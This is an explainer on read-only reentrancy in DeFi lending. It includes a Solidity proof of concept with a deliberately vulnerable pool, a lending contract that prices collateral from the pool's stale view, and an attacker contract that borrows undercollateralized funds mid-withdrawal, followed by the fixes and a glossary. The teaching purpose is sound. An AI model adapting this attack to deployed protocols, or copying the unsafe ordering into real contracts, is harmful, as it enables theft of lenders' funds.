How Does a Read-Only Attack Impact an On-Chain Lending Protocol?
In an on-chain lending protocol, a read-only reentrancy attack lets an attacker manipulate the valuation of collateral or debt without ever re-entering a state-changing function of the lending protocol itself. The stale state lives in a third contract: a pool or token contract whose view functions (a balance, a total supply, a price per share) the lending protocol reads in order to value collateral. The attacker first calls a state-changing function of that external contract, such as a withdrawal, which hands control back to the attacker (through a native-token transfer or a token transfer hook) before it has finished updating its own storage.
From inside that callback the attacker calls the lending protocol's deposit or borrow function. The protocol, as usual, queries the external token contract to check the balance or price it uses for collateral accounting, but the external contract is now half-updated. Its reentrancy guard does not help, because nothing is re-entering it: a view function is simply being read. The lending protocol computes the collateral ratio from that stale, inconsistent value, so an undercollateralized loan can be approved (or, if the stale value is lower than the true one, a healthy position can be wrongly liquidated).
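The sequence above, as an added illustration that is not code from the original page or from any real protocol. All three contracts are hypothetical: `Pool` is an ETH vault whose `pricePerShare()` view other protocols use as an oracle, `Lender` values `Pool` shares as collateral through that view, and `Attacker` borrows from inside the pool's withdrawal callback. The figures in the comments are constructed to make the arithmetic visible.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Hypothetical ETH vault. Like many pools it tracks its reserve in storage rather
// than via address(this).balance, which is what makes the view stale mid-call.
contract Pool {
    mapping(address => uint256) public shares;
    uint256 public totalShares;
    uint256 public reserve;   // ETH the pool believes it holds
    bool public locked;       // true while a state-changing entrypoint is executing

    modifier nonReentrant() {
        require(!locked, "reentrant");
        locked = true;
        _;
        locked = false;
    }

    function deposit() external payable nonReentrant {
        uint256 minted = totalShares == 0 ? msg.value : msg.value * totalShares / reserve;
        shares[msg.sender] += minted;
        totalShares += minted;
        reserve += msg.value;
    }

    // View used by integrators as a price oracle: 1e18 == one ETH per share.
    function pricePerShare() external view returns (uint256) {
        return totalShares == 0 ? 1e18 : reserve * 1e18 / totalShares;
    }

    // VULNERABLE ORDERING: shares are burned, then ETH is sent (control passes to the
    // caller), and only afterwards is `reserve` reduced. The guard blocks re-entering
    // deposit()/withdraw(), but nothing stops a *read* of pricePerShare() during the
    // callback, where the reserve is stale and the reported price is inflated.
    function withdraw(uint256 amount) external nonReentrant {
        require(shares[msg.sender] >= amount, "insufficient shares");
        uint256 payout = amount * reserve / totalShares;
        shares[msg.sender] -= amount;
        totalShares -= amount;
        (bool ok, ) = msg.sender.call{value: payout}("");
        require(ok, "transfer failed");
        reserve -= payout;   // FIX: move this above the call (checks-effects-interactions)
    }
}

// Hypothetical lending protocol: accepts Pool shares as collateral and lends ETH.
contract Lender {
    Pool public immutable pool;
    uint256 public constant LTV_BPS = 7500;   // borrow up to 75% of collateral value
    mapping(address => uint256) public collateralShares;
    mapping(address => uint256) public debt;

    constructor(Pool p) payable { pool = p; }   // funded with ETH to lend out

    // Deposits ETH into the pool on the user's behalf and credits the minted shares.
    function depositCollateral() external payable {
        uint256 before = pool.shares(address(this));
        pool.deposit{value: msg.value}();
        collateralShares[msg.sender] += pool.shares(address(this)) - before;
    }

    // Values collateral with the pool's view at the moment of the call.
    function borrow(uint256 amount) external {
        // FIX (integrator side): refuse to price collateral while the pool is mid-call.
        // require(!pool.locked(), "pool state is being updated");
        uint256 value = collateralShares[msg.sender] * pool.pricePerShare() / 1e18;
        require((debt[msg.sender] + amount) * 10000 <= value * LTV_BPS, "undercollateralized");
        debt[msg.sender] += amount;
        (bool ok, ) = msg.sender.call{value: amount}("");
        require(ok, "transfer failed");
    }
}

contract Attacker {
    Pool immutable pool;
    Lender immutable lender;
    uint256 private pendingBorrow;

    constructor(Pool p, Lender l) payable { pool = p; lender = l; }

    // Constructed figures: honest LPs hold 100 ETH / 100e18 shares (price 1.0).
    // 1. deposit 50 ETH into the pool  -> reserve 150, totalShares 150e18
    // 2. post 10 ETH as collateral     -> reserve 160, totalShares 160e18, Lender holds 10e18
    // 3. withdraw the 50e18 shares: inside the ETH callback totalShares is 110e18 but
    //    reserve is still 160 ETH, so pricePerShare() reports ~1.4545 instead of 1.0.
    //    10e18 shares are then valued at ~14.5 ETH and 75% LTV allows ~10.9 ETH of debt
    //    against collateral truly worth 10 ETH.
    function attack(uint256 amountToBorrow) external {
        pool.deposit{value: 50 ether}();
        lender.depositCollateral{value: 10 ether}();
        pendingBorrow = amountToBorrow;
        pool.withdraw(pool.shares(address(this)));
    }

    receive() external payable {
        // Act only on the pool's payout, not on the ETH the lender sends us afterwards.
        if (msg.sender == address(pool) && pendingBorrow != 0) {
            uint256 amount = pendingBorrow;
            pendingBorrow = 0;
            lender.borrow(amount);   // priced against the stale, inflated share price
        }
    }
}
```

Two independent fixes close this. On the pool side, finish every storage update (here `reserve -= payout`) before making the external call, so no caller ever observes a half-updated state. On the integrator side, treat any external view as untrusted while its contract is mid-execution: the commented `require(!pool.locked())` in `borrow` does that by reading the pool's own reentrancy flag, and a pool that does not expose such a flag can be probed by calling one of its guarded functions and expecting it not to revert. The pool-side fix is the real one; the integrator-side check is the defence you add when you do not control the pool.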
Glossary
Deposit Function
Execution ⎊ Deposit Function refers to the specific contract logic responsible for accepting and locking collateral assets into a system, often required for margin trading or participation in liquidity pools for derivatives.
Lending Protocol
Service ⎊ A Lending Protocol automates the process of connecting providers of capital (lenders) with users requiring capital (borrowers) through smart contracts that enforce collateralization and interest rate mechanisms.
Undercollateralized Loan
Exposure ⎊ An undercollateralized loan, within cryptocurrency, options trading, and financial derivatives, represents an obligation where the value of the debt exceeds the value of the collateral pledged against it, leaving the lender exposed to a loss that liquidation cannot fully recover.
External Token Contract
Contract ⎊ An external token contract refers to a smart contract that manages a specific cryptocurrency asset, existing independently of the primary protocol that interacts with it.
Read-Only Reentrancy Attack
Vulnerability ⎊ A Read-Only Reentrancy Attack exploits the window in which a contract has handed control to an external caller before finishing its own state updates. Unlike classic reentrancy, the attacker does not re-enter a state-changing function of that contract (a reentrancy guard would stop that); instead, from inside the callback, the attacker calls a second protocol that reads the first contract's view functions, which now return inconsistent values for balances, total supply or price. Any protocol that uses such a view as an oracle, a lending protocol valuing collateral above all, is the victim.